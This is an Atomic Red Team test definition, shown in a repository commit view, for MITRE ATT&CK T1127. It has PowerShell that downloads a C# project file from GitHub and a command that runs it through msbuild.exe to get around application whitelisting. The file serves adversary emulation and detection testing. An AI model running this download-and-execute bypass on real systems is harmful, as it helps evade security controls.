JrOrOneEquals1
c6d8809af3
* Added prereqs * Added prereqs * Add prereqs * undeleting file * corrections * Corrections
31 lines
1.0 KiB
YAML
31 lines
1.0 KiB
YAML
---
|
|
attack_technique: T1127
|
|
display_name: Trusted Developer Utilities
|
|
atomic_tests:
|
|
- name: MSBuild Bypass Using Inline Tasks
|
|
description: |
|
|
Executes the code in a project file using. C# Example
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
filename:
|
|
description: Location of the project file
|
|
type: Path
|
|
default: PathToAtomicsFolder\T1127\src\T1127.csproj
|
|
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Project file must exist on disk at specified location (#{filename})
|
|
prereq_command: |
|
|
if (Test-Path #{filename}) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#{filename}"
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
|